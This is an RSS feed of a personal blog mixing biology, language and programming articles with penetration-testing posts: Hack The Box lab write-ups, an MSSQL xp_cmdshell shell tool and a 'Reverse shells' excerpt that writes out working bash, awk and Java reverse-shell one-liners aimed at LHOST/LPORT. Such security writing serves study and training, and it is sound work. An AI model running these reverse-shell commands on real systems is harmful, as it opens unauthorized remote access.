<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>The Portal of Knowledge</title>
    <link>https://alamot.github.io/</link>
    <description>Recent content on The Portal of Knowledge</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 22 Apr 2018 00:00:00 +0000</lastBuildDate>
    
	<atom:link href="https://alamot.github.io/index.xml" rel="self" type="application/rss+xml" />
    
    
    <item>
      <title>Known-plaintext attack tool for XOR-encrypted data</title>
      <link>https://alamot.github.io/xor_kpa/</link>
      <pubDate>Sun, 22 Apr 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/xor_kpa/</guid>
      <description>Let&#39;s say we XOR-encrypt a text file using this &#34;secure&#34; password/key: @v3RyS3cREtK3y!
We should not forget that:
plaintext ⊕ key = encrypted_text encrypted_text ⊕ plaintext = key  If the key is smaller than the plaintext, the key is repeated. This fact makes this encryption scheme extremely weak.
In practice, the above equations mean that if we know a part of the initial plaintext, then we can retrieve part of the key relatively easily.</description>
    </item>
    
    <item>
      <title>Inception write-up</title>
      <link>https://alamot.github.io/inception_writeup/</link>
      <pubDate>Sat, 14 Apr 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/inception_writeup/</guid>
      <description>Enumeration Port scanning $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.67 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-04-14 09:24:04 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 80/tcp on 10.10.10.67 Discovered open port 3128/tcp on 10.10.10.67  We found TCP ports 80 and 3128 open. Let&amp;rsquo;s explore them using nmap: $ sudo nmap -A -p80,3128 10.</description>
    </item>
    
    <item>
      <title>MSSQL shell with file upload capability</title>
      <link>https://alamot.github.io/mssql_shell/</link>
      <pubDate>Fri, 13 Apr 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/mssql_shell/</guid>
      <description>Sometimes we can get access to a Microsoft SQL server in which the execution of the xp_cmdshell stored procedure is allowed but other kind of traffic (TCP, UDP, ICMP et.c.) is blocked by some kind of firewall. This can make the acquisition of a shell more difficult. In such cases, it would be useful to have a kind of shell via multiple xp_cmdshell commands. One problem with that approach is that every xp_cmdshell command will be executed in a new context.</description>
    </item>
    
    <item>
      <title>Reverse shells</title>
      <link>https://alamot.github.io/reverse_shells/</link>
      <pubDate>Thu, 12 Apr 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/reverse_shells/</guid>
      <description>Awk awk &amp;#39;BEGIN {s = &amp;#34;/inet/tcp/0/LHOST/LPORT&amp;#34;; while(42) { do{ printf &amp;#34;shell&amp;gt;&amp;#34; |&amp;amp; s; s |&amp;amp; getline c; if(c){ while ((c |&amp;amp; getline) &amp;gt; 0) print $0 |&amp;amp; s; close(c); } } while(c != &amp;#34;exit&amp;#34;) close(s); }}&amp;#39; /dev/null Bash bash -i &amp;gt;&amp;amp; /dev/tcp/LHOST/LPORT 0&amp;gt;&amp;amp;1 0&amp;lt;&amp;amp;196;exec 196&amp;lt;&amp;gt;/dev/tcp/LHOST/LPORT; sh &amp;lt;&amp;amp;196 &amp;gt;&amp;amp;196 2&amp;gt;&amp;amp;196 exec 5&amp;lt;&amp;gt;/dev/tcp/LHOST/LPORT &amp;amp;&amp;amp; while read line 0&amp;lt;&amp;amp;5; do $line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done
Java r = Runtime.getRuntime(); p = r.exec([&amp;#34;/bin/bash&amp;#34;,&amp;#34;-c&amp;#34;,&amp;#34;exec 5&amp;lt;&amp;gt;/dev/tcp/LHOST/LPORT;cat &amp;lt;&amp;amp;5 | while read line; do \$line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done&amp;#34;] as String[]); p.</description>
    </item>
    
    <item>
      <title>Minion write-up</title>
      <link>https://alamot.github.io/minion_writeup/</link>
      <pubDate>Tue, 10 Apr 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/minion_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan: $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.57 Starting masscan 1.0.4 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 62696/tcp on 10.10.10.57 rate: 0.00-kpps, 100.00% done, waiting 3-secs, found=1
We found TCP port 62696 open. Let&amp;rsquo;s explore it using nmap: $ sudo nmap -A -p62696 10.</description>
    </item>
    
    <item>
      <title>Sense write-up</title>
      <link>https://alamot.github.io/sense_writeup/</link>
      <pubDate>Sat, 24 Mar 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/sense_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan: $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.60 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-03-22 09:51:28 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 443/tcp on 10.10.10.60 Discovered open port 80/tcp on 10.10.10.60
We found TCP ports 80 and 443 open. Let&amp;rsquo;s explore them using nmap: $ sudo nmap -A -p80,443 10.</description>
    </item>
    
    <item>
      <title>Enterprise write-up</title>
      <link>https://alamot.github.io/enterprise_writeup/</link>
      <pubDate>Mon, 19 Mar 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/enterprise_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan: $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.61 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-03-15 09:28:39 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 8080/tcp on 10.10.10.61 Discovered open port 443/tcp on 10.10.10.61 Discovered open port 80/tcp on 10.10.10.61 Discovered open port 22/tcp on 10.</description>
    </item>
    
    <item>
      <title>Node write-up</title>
      <link>https://alamot.github.io/node_writeup/</link>
      <pubDate>Sat, 03 Mar 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/node_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan: $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.58 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-02-28 16:09:43 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 3000/tcp on 10.10.10.58 Discovered open port 22/tcp on 10.10.10.58 
We found TCP ports 22 and 3000 open. Let&amp;rsquo;s explore them using nmap: $ sudo nmap -A -p22,3000 10.</description>
    </item>
    
    <item>
      <title>Mantis write-up</title>
      <link>https://alamot.github.io/mantis_writeup/</link>
      <pubDate>Sun, 18 Feb 2018 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/mantis_writeup/</guid>
      <description>Enumeration Port scanning TCP ports We scan the full range of TCP ports using nmap: $ sudo nmap -T4 -A -p- 10.10.10.52 PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:05:01Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.</description>
    </item>
    
    <item>
      <title>Nineveh write-up</title>
      <link>https://alamot.github.io/nineveh_writeup/</link>
      <pubDate>Sun, 17 Dec 2017 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/nineveh_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan: $ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.43 Password: Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2017-12-17 09:45:27 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 80/tcp on 10.10.10.43 Discovered open port 443/tcp on 10.10.10.43 
We found TCP ports 80 and 443 open.</description>
    </item>
    
    <item>
      <title>Optimum write-up</title>
      <link>https://alamot.github.io/optimum_writeup/</link>
      <pubDate>Sat, 28 Oct 2017 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/optimum_writeup/</guid>
      <description>Enumeration Port scanning We scan the full range of TCP ports using masscan (Why masscan? Because it&amp;rsquo;s faster than nmap)
$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2017-10-10 09:58:16 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 80/tcp on 10.10.10.8 We found TCP port 80 open. Let&amp;rsquo;s explore it using nmap: $ sudo nmap -A -p80 10.</description>
    </item>
    
    <item>
      <title>Legacy write-up</title>
      <link>https://alamot.github.io/legacy_writeup/</link>
      <pubDate>Thu, 19 Oct 2017 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/legacy_writeup/</guid>
      <description>Enumeration Port scanning $ sudo nmap -A 10.10.10.4 Nmap scan report for 10.10.10.4 PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%) OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_nbstat: NetBIOS name: LEGACY, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 | smb-security-mode: | account_used: &amp;lt;blank&amp;gt; | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Exploitation Installing Fuzzbunch on Linux Install wine and winetricks using the package manager of your linux distro.</description>
    </item>
    
    <item>
      <title>Moocing all around the world</title>
      <link>https://alamot.github.io/moocing/</link>
      <pubDate>Fri, 07 Apr 2017 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/moocing/</guid>
      <description>I am always keen to learn new things and broaden my horizons. Therefore, I often attend free Massive Open Online Courses (MOOCs). At present, I have completed successfully more than 300 MOOCs (most of them with distinction).
Mου αρέσει πολύ να μαθαίνω νέα πράγματα και να διευρύνω τους οριζοντές μου. Ως εκ τούτου, συχνά παρακουθώ δωρεάν ανοιχτά διαδικτυακά μαθήματα. Επί του παρόντος, έχω ολοκληρώσει επιτυχημένα περισσότερα από 300 τέτοια μαθήματα (τα περίσσοτερα από αυτά με διάκριση).</description>
    </item>
    
    <item>
      <title>How to determine the character encoding of a text file</title>
      <link>https://alamot.github.io/test_encodings/</link>
      <pubDate>Fri, 21 Oct 2016 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/test_encodings/</guid>
      <description>IntroductionΕισαγωγή If you have ever encountered a text file with gibberish characters, then you know that -many times- it is quite difficult to determine its correct character encoding.
Αν έχετε βρεθεί ποτέ αντιμέτωποι με ένα αρχείο κειμένου που περιέχει ακαταλαβίστικους χαρακτήρες, τότε γνωρίζετε ότι -πολλές φορές- είναι αρκετά δύσκολο να αναγνωρίσετε ποια είναι η σωστή κωδικοποίηση των χαρακτήρων.
There is an automatic universal encoding detector for Python 2 and 3 here: https://pypi.</description>
    </item>
    
    <item>
      <title>Git &amp; Mercurial: How to commit-push fast and easily</title>
      <link>https://alamot.github.io/fast_commit_push/</link>
      <pubDate>Mon, 17 Oct 2016 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/fast_commit_push/</guid>
      <description>Git and Mercurial are distributed revision-control tools for software development and other version control tasks. We present two bash scripts, one for each tool, to help us commit and push our changes fast and easily.
Το Git και το Mercurial είναι εργαλεία κατανεμημένου ελέγχου-αναθεώρησης για ανάπτυξη λογισμικού και άλλες εργασίες ελέγχου έκδοσης. Παρουσιάζουμε δύο σενάρια bash, ένα για κάθε εργαλείο, που μας βοηθάνε να κάνουμε commit και push τις αλλαγές μας γρήγορα και εύκολα.</description>
    </item>
    
    <item>
      <title>How to get info for the wireless interface using nl80211 in C</title>
      <link>https://alamot.github.io/nl80211/</link>
      <pubDate>Sun, 09 Oct 2016 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/nl80211/</guid>
      <description>nl80211 The nl80211 is the 802.11 netlink-based userspace interface for the new cfg80211 configuration system for wireless hardware. Together they are intended to replace the old Wireless-Extensions. Current users of nl80211 include:
H nl80211 είναι η διεπαφή χρήστη (βασισμένη στο netlink 802.11) για το νέο σύστημα διαρρύθμισης cfg80211 του ασύρματου υλικού. Μαζί προορίζονται να αντικαταστήσουν τα παλιά Wireless-Extensions. Το nl80211 χρησιμοποιείται μεταξύ αλλων από τα:
 iw crda hostapd wpa_supplicant (-Dnl80211)  Includes First of all, let&#39;s add the necessary includes:</description>
    </item>
    
    <item>
      <title>Creation of a transparent shutdown GUI using Gtk and Cairo in Python</title>
      <link>https://alamot.github.io/shutdown_manager_transparent/</link>
      <pubDate>Mon, 19 Sep 2016 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/shutdown_manager_transparent/</guid>
      <description>Many window managers in Linux are lacking a graphical «shutdown» interface. In our previous article, we showed how we can implement one, quite easily, using GTK and Python. Now, we will show how to make it transparent using Cairo.
Πολλοί διαχειριστές παραθύρων στο Linux δε διαθέτουν μια γραφική διεπαφή «κλεισίματος». Σε προηγούμενο άρθρο μας, δείξαμε πώς μπορείτε να υλοποιήσετε μία, αρκετά εύκολα, χρησιμοποιώντας GTK και Python. Τώρα, θα δείξουμε πως μπορείτε να την κάνετε διάφανη χρησιμοποιώντας Cairo.</description>
    </item>
    
    <item>
      <title>Creation of a shutdown GUI using Gtk in Python</title>
      <link>https://alamot.github.io/shutdown_manager_plain/</link>
      <pubDate>Thu, 21 Jul 2016 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/shutdown_manager_plain/</guid>
      <description>Many window managers in Linux are lacking a graphical «shutdown» interface. Here, we show how we can implement one, quite easily, using gtk and python. In a follow-up article, we show how we can create a transparent GUI using Cairo.
Πολλοί διαχειριστές παραθύρων στο Linux δε διαθέτουν μια γραφική διεπαφή «κλεισίματος». Εδώ, θα δείξουμε πώς μπορείτε να υλοποιήσετε μία, αρκετά εύκολα, χρησιμοποιώντας gtk και python. Σε επόμενο άρθρο μας, δείχνουμε πώς μπορείτε να δημιουργήσετε μια διάφανη διεπαφή χρήστη χρησιμοποιώντας Cairo.</description>
    </item>
    
    <item>
      <title>Informatics tests (available in greek only)</title>
      <link>https://alamot.github.io/testakia_pliroforikis/</link>
      <pubDate>Fri, 25 Sep 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/testakia_pliroforikis/</guid>
      <description>Αυτή είναι μια εφαρμογή που δημιούργησα το 2015. Πρόκειται για ένα σύνολο από τεστάκια με ερωτήσεις πολλαπλής επιλογής πάνω στο γνωστικό αντικείμενο της Πληροφορικής. Η εφαρμογή αυτή διατίθεται εντελώς ΔΩΡΕΑΝ και ΔΕΝ περιέχει διαφημίσεις.
Προς το παρόν, περιέχονται συνολικά περίπου 200 ερωτήσεις που προέρχονται από τους διαγωνισμούς του ΑΣΕΠ του 2002, 2005 και 2008. Οι ερωτήσεις αυτές έχουν κατανεμηθεί σε διάφορους επιμέρους θεματικούς τομείς της επιστήμης της Πληροφορικής.
ScreenshotsΕικόνες     FeaturesΧαρακτηριστικά ★ Εξαιρετικά μικρό μέγεθος (~144 KB)</description>
    </item>
    
    <item>
      <title>Biology tests (available in greek only)</title>
      <link>https://alamot.github.io/testakia_viologias/</link>
      <pubDate>Sat, 22 Aug 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/testakia_viologias/</guid>
      <description>Αυτή είναι μια εφαρμογή που δημιούργησα το 2015. Πρόκειται για ένα σύνολο από τεστάκια με ερωτήσεις πολλαπλής επιλογής πάνω στο γνωστικό αντικείμενο της Βιολογίας. Η εφαρμογή αυτή διατίθεται εντελώς ΔΩΡΕΑΝ και ΔΕΝ περιέχει διαφημίσεις.
Προς το παρόν, περιέχονται συνολικά περίπου 200 ερωτήσεις που προέρχονται από τους διαγωνισμούς του ΑΣΕΠ για Βιολόγους του 2002, 2004, 2006 και 2008 και μόνο από το βιολογικό μέρος του &amp;ldquo;Γνωστικού αντικειμένου&amp;rdquo;. Οι ερωτήσεις αυτές έχουν κατανεμηθεί σε διάφορους επιμέρους θεματικούς τομείς της επιστήμης της Βιολογίας.</description>
    </item>
    
    <item>
      <title>Retriever of Lost Dreams</title>
      <link>https://alamot.github.io/rold/</link>
      <pubDate>Sun, 16 Aug 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/rold/</guid>
      <description>Your name is Rold. You live in a very special place in the Universe. This place is called Dreamland. Your job is to foster and guard the Dream Stars. For, from their stardust, the people&#39;s dreams are born.
For a long time, everything was running smoothly and you loved your job. But one day, an evil Force stole all the Dream Stars from Dreamland and hid them in a castle with many rooms, full of traps.</description>
    </item>
    
    <item>
      <title>Quotests</title>
      <link>https://alamot.github.io/quotests/</link>
      <pubDate>Tue, 07 Jul 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/quotests/</guid>
      <description>This application consists of multiple choice quizzes to test your English language skills. But there is a twist. Instead of using common boring phrases, it features text from great quotes by famous people! Αυτή η εφαρμογή περιέχει τεστάκια με ερωτήσεις πολλαπλής επιλογής για να ελέγξετε τις ικανότητές σας στην αγγλική γλώσσα. Αλλά υπάρχει μια σημαντική ανατροπή. Αντί για ανιαρές τετριμένες φράσεις, σας παρουσιάζει καταπληκτικά γνωμικά από διάσημους ανθρώπους! FeaturesΧαρακτηριστικά ★ Share quote via.</description>
    </item>
    
    <item>
      <title>Russian songs with greek subtitles</title>
      <link>https://alamot.github.io/music_ru2el_subs/</link>
      <pubDate>Sat, 14 Mar 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/music_ru2el_subs/</guid>
      <description>Частушка Chastúshka (russian: часту́шка, pl. часту́шки) is a traditional type of humorous folk song with high beat frequency. It is popular in Russia and neighboring countries. The word «частушка» derives from «часто» = «frequently», or from «части́ть» = old word, that means «to do something with high frequency» and probably refers to the high beat frequency (tempo) of chastushki. Chastushka makes use of a simple rhyming scheme to convey а content full of humor, satire or irony.</description>
    </item>
    
    <item>
      <title>The declension of russian nouns (available in greek only)</title>
      <link>https://alamot.github.io/russian_nouns_declension/</link>
      <pubDate>Wed, 04 Feb 2015 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/russian_nouns_declension/</guid>
      <description>ΟΥΣΙΑΣΤΙΚΑ -ы*: Μετά από συριστικό (ч, ш, щ, ж) ή υπερωικό (г, к, х) αντί για ы γράφουμε и.
-о*/-ой*/-ом*: Μετά από συριστικό (ч, ш, щ, ж), αν η συλλαβή δεν τονίζεται γράφουμε е αντί για о.
-е*/-ей*/-ем*/-ев*: Μετά από μαλακό σύμφωνο, αν η συλλαβή τονίζεται γράφουμε ё στη θέση του е.
  ΕΝΙΚΟΣ ΠΛΗΘΥΝΤΙΚΟΣ  ΟΝΟΜ. ΓΕΝ. ΔΟΤ. ΑΙΤ. ΟΡΓ. ΠΡΟΘ. ΟΝΟΜ. ΓΕΝ. ΔΟΤ. ΑΙΤ. ΟΡΓ. ΠΡΟΘ.  -а -ы* -е -у -ой* / -ою -е -ы*_ -ам Άψυχο:</description>
    </item>
    
    <item>
      <title>Alamot&#39;s matchstick puzzles</title>
      <link>https://alamot.github.io/matchsticks/</link>
      <pubDate>Tue, 11 Mar 2014 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/matchsticks/</guid>
      <description>This is a game with matchstick puzzles I created in 2014.
Αυτό είναι ένα παιχνίδι με σπαζοκεφαλιές σπίρτων που δημιούργησα το 2014.
FeaturesΧαρακτηριστικά 100 awesome matchstick puzzles! Can you solve them all?  Great variety of categories Puzzles with movement, removal or rotation of matchsticks Solve geometry problems Form squares, triangles, rectangles, rhombi and other shapes Divide figures into identical parts Change the total surface Transform shapes Multiply objects Correct math equations Find the word problems Solve riddles ★ Bonus ★: Under the instructions for each puzzle, there are various history facts, fun facts, trivia, quotes, proverbs, poems and even short stories about matches!</description>
    </item>
    
    <item>
      <title>How to build a responsive popup window with scrolling capability in Kivy</title>
      <link>https://alamot.github.io/kivy_popup/</link>
      <pubDate>Wed, 19 Feb 2014 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/kivy_popup/</guid>
      <description>Kivy is a cross-platform Python framework for rapid development of applications that make use of innovative user interfaces, such as multi-touch etc. In this article, we show how to build a responsive popup window with scrolling capability.
To Kivy είναι ένα cross-platform Python για γρήγορη ανάπτυξη εφαρμογών σε πολλές διαφορετικές πλατφόρμες που χρησιμοποιεί πρωτοποριακές διεπαφές χρήστη, όπως πολλαπλή αφή κλπ. Σε αυτό το άρθρο, δείχνουμε πως φτιάχνεται ένα ευέλικτο αναδυόμενο παράθυρο με δυνατότητα κύλισης.</description>
    </item>
    
    <item>
      <title>The Neo-Babylonian Empire</title>
      <link>https://alamot.github.io/neobabylonian_empire/</link>
      <pubDate>Tue, 12 Nov 2013 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/neobabylonian_empire/</guid>
      <description>The Neo-Babylonian Empire (аlso known as the Chaldean Empire) was a short-lived empire (626-539 BCE) in the «Fertile Crescent» of the Middle East. The Fertile Crescent is a region which includes Mesopotamia (the land in and around the Tigris and Euphrates rivers) and the Levant (the eastern coast of the Mediterranean Sea).
Η Νεο-Βαβυλωνιακή Αυτοκρατορία (γνωστή και ως Χαλδαίικη Αυτοκρατορία, δηλαδή αυτοκρατορία των Χαλδαίων) ήταν μια βραχύβια αυτοκρατορία (626-539 ΠΚΕ) στην «Εύφορη Ημισέληνο» της Μέσης Ανατολής.</description>
    </item>
    
    <item>
      <title>Mind control parasites. How do they do it?</title>
      <link>https://alamot.github.io/mindcontrol_parasites/</link>
      <pubDate>Thu, 03 Oct 2013 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/mindcontrol_parasites/</guid>
      <description>Did you know that there are parasites that can manipulate the behavior of their host organism? The hairworms is such an example. Hairworms are long thin wormlike parasites. Their scientific name is Nematomorpha. They parasite mostly on insects, like crickets for example. Crickets are living on the land but hairworms can reproduce only in water. Therefore, hairworms have to «drive» their host towards water bodies. Most times this results in the death of the host because crickets get drawn themselves.</description>
    </item>
    
    <item>
      <title>A consensus method for the prediction of aggregation-prone peptides in globular proteins</title>
      <link>https://alamot.github.io/amylpred2/</link>
      <pubDate>Thu, 10 Jan 2013 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/amylpred2/</guid>
      <description>My Bachelor&#39;s thesis in Biology was about developing a consensus method for the prediction of amyloidogenic determinants in globular proteins. Several studies suggest that not all regions of a polypeptide chain are equally important for determining its aggregation tendency. It seems that protein aggregation is mediated by short aggregation prone segments. These aggregation nucleating regions can be detected in the sequence of a protein in silico based on physicochemical principles (phenomenological models) or/and molecular simulation approaches.</description>
    </item>
    
    <item>
      <title>Evolutionarily Stable Strategies (available in greek only)</title>
      <link>https://alamot.github.io/ess/</link>
      <pubDate>Thu, 01 Nov 2012 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/ess/</guid>
      <description>Εισαγωγή Εξελικτικά Σταθερή Στρατηγική (ΕΣΣ) είναι μια στρατηγική η οποία, αν υιοθετηθεί από έναν πληθυσμό, δεν μπορεί να υποστεί εισβολή από μια διαφορετική (μεταλλαγμένη) στρατηγική διότι σταθεροποιείται μέσω των διεργασίων της φυσικής επιλογής. Μπορούμε να εκφράσουμε διαφορετικά αυτή την ιδέα αν πούμε ότι η καλύτερη στρατηγική για ένα μεμονωμένο άτομο εξαρτάται από αυτό που κάνουν τα περισσότερα άτομα του πληθυσμού. Επειδή το υπόλοιπο του πληθυσμού αποτελείται και αυτό από μεμονωμένα άτομα, και το καθένα προσπαθεί να μεγιστοποιήσει τα δικά του κέρδη, η μόνη στρατηγική που σταθεροποιείται είναι αυτή η οποία, μόλις εμφανιστεί διαμέσου της εξέλιξης, δεν μπορεί να βελτιωθεί περισσότερο από κάποιο άτομο που αποκλίνει από τη συγκεκριμένη στρατηγική.</description>
    </item>
    
    <item>
      <title>Amyloid fibrils (available in greek only)</title>
      <link>https://alamot.github.io/amyloids/</link>
      <pubDate>Wed, 11 Jul 2012 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/amyloids/</guid>
      <description>Σύντομη ιστορική αναδρομή Η λέξη «αμυλοειδές» επινοήθηκε αρχικά (1838) από τον βοτανολόγο Matthias Jakob Schleiden1, από την ελληνική λέξη «άμυλον», για να περιγράψει φυσιολογικά αμυλώδη συστατικά των φυτών. Το 1854, ο Rudolf Ludwig Carl Virchow2 χρησιμοποίησε τον όρο για να δηλώσει μακροσκοπικές ανωμαλίες σε ανθρώπινους ιστούς (όπως τα «corpora amylacea» στον εγκέφαλο, οι «στεατώδεις» εναποθέσεις που εντοπίζονταν στο ήπαρ και ο «κηρώδης» σπλήνας), που βάφονταν μπλε με διάλυμα ιωδίου και μωβ με τη προσθήκη πυκνού θειικού οξέος3, επειδή πίστευε ότι είχαν υποστεί «κυτταρινομεταμόρφωση».</description>
    </item>
    
    <item>
      <title>Centrioles (available in greek only)</title>
      <link>https://alamot.github.io/centrioles/</link>
      <pubDate>Sun, 22 Jan 2012 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/centrioles/</guid>
      <description>Εισαγωγή Το κεντροσωμάτιο εντοπίσθηκε πρώτη φορά το 1883 από τον Βέλγο εμβρυολόγο και κυτταρολόγο Edouard Van Beneden, αλλά το περιέγραψε και το ονόμασε το 1888 ο Γερμανός βιολόγος Theodor Boveri στον οργανισμό Ascaris megalocephala. Το όνομα του οφείλεται στο ότι εντοπίζεται πολύ συχνά κοντά προς το κέντρο του κυττάρου, σε αντιδιαστολή με άλλα οργανίδια.
 Edouard van Beneden
(1846-1910)    Theodor Boveri
(1862-1915)    Στο κέντρο του κεντροσωματίου, συνήθως, εντοπίζεται ένα ζευγάρι κυλινδρικών βαρελοειδών σχηματισμών που σχετίζονται δομικά με τα βασικά σωμάτια που οργανώνουν τις βλεφαρίδες και τα μαστίγια και ονομάζονται κεντριόλια.</description>
    </item>
    
    <item>
      <title>Multifunctional proteins and evolution (available in greek only)</title>
      <link>https://alamot.github.io/multifunctional_proteins/</link>
      <pubDate>Tue, 17 Jan 2012 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/multifunctional_proteins/</guid>
      <description>Εισαγωγή Σε αυτό το άρθρο θα εξετάσουμε τις διάφορες κατηγορίες πολυλειτουργικών πρωτεϊνών και τη σχέση τους με την εξέλιξη.
Μultidomain πρωτεΐνες Πρόκειται για πρωτεΐνες που αποτελούνται από περισσότερες από μια αυτοτελείς δομικές περιοχές / επικράτειες (domains). Η πλειοψηφία των πρωτεϊνών (περίπου τα 2&amp;frasl;3 στους μονοκύτταρους οργανισμούς και πάνω από το 80% στα μετάζωα) ανήκουν σε αυτήν την κατηγορία. Πολλά από τα αυτοτελή δομικά στοιχεία από τα οποία αποτελούνται οι πρωτεΐνες των ευκαρυωτικών οργανισμών μπορούν να βρεθούν ως ανεξάρτητες (ομόλογες;) πρωτεΐνες στους προκαρυωτικούς.</description>
    </item>
    
    <item>
      <title>The evolution of Cetaceans (available in greek only)</title>
      <link>https://alamot.github.io/evolution_of_cetaceans/</link>
      <pubDate>Thu, 17 Nov 2011 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/evolution_of_cetaceans/</guid>
      <description>Εισαγωγή Τα αρτίγονα Κητώδη ταξινομούνται σε δύο κύριες ομάδες (υποτάξεις):
 Μυστακοκήτη: Εδώ ανήκουν όλα τα φαλαινοφόρα κήτη (φάλαινες), δηλαδή τα κήτη που φέρουν στο στόμα τους κεράτινα ελάσματα που λέγονται φαλαίνια (μπαλένες). Σημειώστε ότι η γαλάζια φάλαινα (Balaenoptera musculus) με μήκος που φτάνει ακόμη και τα 30 μέτρα και βάρος πάνω από 180 τόνους, αποτελεί όχι μόνο τον μεγαλύτερο αρτίγονο ζωικό οργανισμό, αλλά -από όσο γνωρίζουμε- και τον μεγαλύτερο που έχει υπάρξει ποτέ στον πλανήτη Γη.</description>
    </item>
    
    <item>
      <title>The organism with the smallest genome and proteome</title>
      <link>https://alamot.github.io/smallest_genome/</link>
      <pubDate>Sat, 06 Aug 2011 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/smallest_genome/</guid>
      <description>QuestionΕρώτημα Which organism has the smallest genome and proteome size?
Ποιός είναι άραγε ο οργανισμός εκείνος που έχει το μικρότερο γονιδίωμα και πρωτέωμα;
